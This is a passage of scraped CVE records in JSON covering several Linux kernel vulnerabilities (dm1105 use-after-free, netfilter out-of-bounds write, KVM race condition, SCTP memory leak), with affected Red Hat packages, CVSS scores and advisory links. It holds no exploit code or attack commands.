"mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in dm1105_remove in drivers/media/pci/dm1105/dm1105.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-10-19T23:06:27.639148", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2" }, { "url": "https://lore.kernel.org/all/49bb0b6a-e669-d4e7-d742-a19d2763e947%40xs4all.nl/" }, { "url": "https://lore.kernel.org/lkml/20230318081506.795147-1-zyytlz.wz%40163.com/" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5abda7a16698d4d1f47af1168d8fa2c640116b4a" }, { "name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230803-0002/" }, { "name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-35824", "datePublished": "2023-06-18T00:00:00", "dateReserved": "2023-06-18T00:00:00", "dateUpdated": "2024-08-02T16:30:45.338Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-42753
Vulnerability from cvelistv5
Published
2023-09-25 20:25
Modified
2024-09-13 18:42
Severity ?
EPSS score ?
Summary
Kernel: netfilter: potential slab-out-of-bound access due to integer underflow
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:30:24.424Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html" }, { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7382", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7382" }, { "name": "RHSA-2023:7389", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7389" }, { "name": "RHSA-2023:7411", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7411" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7539", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7539" }, { "name": "RHSA-2023:7558", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7558" }, { "name": "RHSA-2024:0089", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0089" }, { "name": "RHSA-2024:0113", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0113" }, { "name": "RHSA-2024:0134", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0134" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0346", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0346" }, { "name": "RHSA-2024:0347", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0347" }, { "name": "RHSA-2024:0371", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0371" }, { "name": "RHSA-2024:0376", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0376" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0402", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0402" }, { "name": "RHSA-2024:0403", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0403" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0562", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0562" }, { "name": "RHSA-2024:0563", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0563" }, { "name": "RHSA-2024:0593", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0593" }, { "name": "RHSA-2024:0999", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0999" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42753" }, { "name": "RHBZ#2239843", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239843" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2023/q3/216" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2023/09/22/10" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_extras_rt:7" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.10.0-1160.108.1.rt56.1259.el7", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7::computenode", "cpe:/o:redhat:enterprise_linux:7::server", "cpe:/o:redhat:enterprise_linux:7::client", "cpe:/o:redhat:enterprise_linux:7::workstation" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.10.0-1160.108.1.el7", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7::server" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:7.7::server" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7.7 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.10.0-1062.85.1.el7", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::nfv", "cpe:/a:redhat:enterprise_linux:8::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.11.1.rt7.313.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.11.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.120.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::realtime", "cpe:/a:redhat:rhel_tus:8.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.120.1.rt13.171.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.120.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.120.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::nfv", "cpe:/a:redhat:rhel_tus:8.4::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.rt7.196.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.120.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:8.8::crb", "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.36.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos", "cpe:/a:redhat:rhel_eus:9.0::crb", "cpe:/a:redhat:rhel_eus:9.0::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.80.1.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::realtime", "cpe:/a:redhat:rhel_eus:9.0::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.80.1.rt21.151.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.40.1.rt14.325.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "unaffected", "packageName": "kpatch-patch", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhev_hypervisor:4.4::el8", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhel_eus:8.6::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.87.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-09-22T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h-\u003enets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:42:05.332Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:7370", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7370" }, { "name": "RHSA-2023:7379", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7379" }, { "name": "RHSA-2023:7382", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7382" }, { "name": "RHSA-2023:7389", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7389" }, { "name": "RHSA-2023:7411", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7411" }, { "name": "RHSA-2023:7418", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7418" }, { "name": "RHSA-2023:7539", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7539" }, { "name": "RHSA-2023:7558", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7558" }, { "name": "RHSA-2024:0089", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0089" }, { "name": "RHSA-2024:0113", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0113" }, { "name": "RHSA-2024:0134", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0134" }, { "name": "RHSA-2024:0340", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0340" }, { "name": "RHSA-2024:0346", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0346" }, { "name": "RHSA-2024:0347", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0347" }, { "name": "RHSA-2024:0371", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0371" }, { "name": "RHSA-2024:0376", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0376" }, { "name": "RHSA-2024:0378", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0378" }, { "name": "RHSA-2024:0402", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0402" }, { "name": "RHSA-2024:0403", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0403" }, { "name": "RHSA-2024:0412", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0412" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:0562", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0562" }, { "name": "RHSA-2024:0563", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0563" }, { "name": "RHSA-2024:0593", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0593" }, { "name": "RHSA-2024:0999", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0999" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-42753" }, { "name": "RHBZ#2239843", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2239843" }, { "url": "https://seclists.org/oss-sec/2023/q3/216" } ], "timeline": [ { "lang": "en", "time": "2023-09-20T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-22T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: netfilter: potential slab-out-of-bound access due to integer underflow", "workarounds": [ { "lang": "en", "value": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible." } ], "x_redhatCweChain": "CWE-191-\u003eCWE-787: Integer Underflow (Wrap or Wraparound) leads to Out-of-bounds Write" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-42753", "datePublished": "2023-09-25T20:25:59.706Z", "dateReserved": "2023-09-13T11:03:47.961Z", "dateUpdated": "2024-09-13T18:42:05.332Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-45869
Vulnerability from cvelistv5
Published
2022-11-30 00:00
Modified
2024-08-03 14:24
Severity ?
EPSS score ?
Summary
A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:24:03.200Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47b0c2e4c220f2251fd8dcfbb44479819c715e15" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-30T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47b0c2e4c220f2251fd8dcfbb44479819c715e15" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-45869", "datePublished": "2022-11-30T00:00:00", "dateReserved": "2022-11-23T00:00:00", "dateUpdated": "2024-08-03T14:24:03.200Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1074
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A memory leak flaw was found in the Linux kernel's Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service.
References
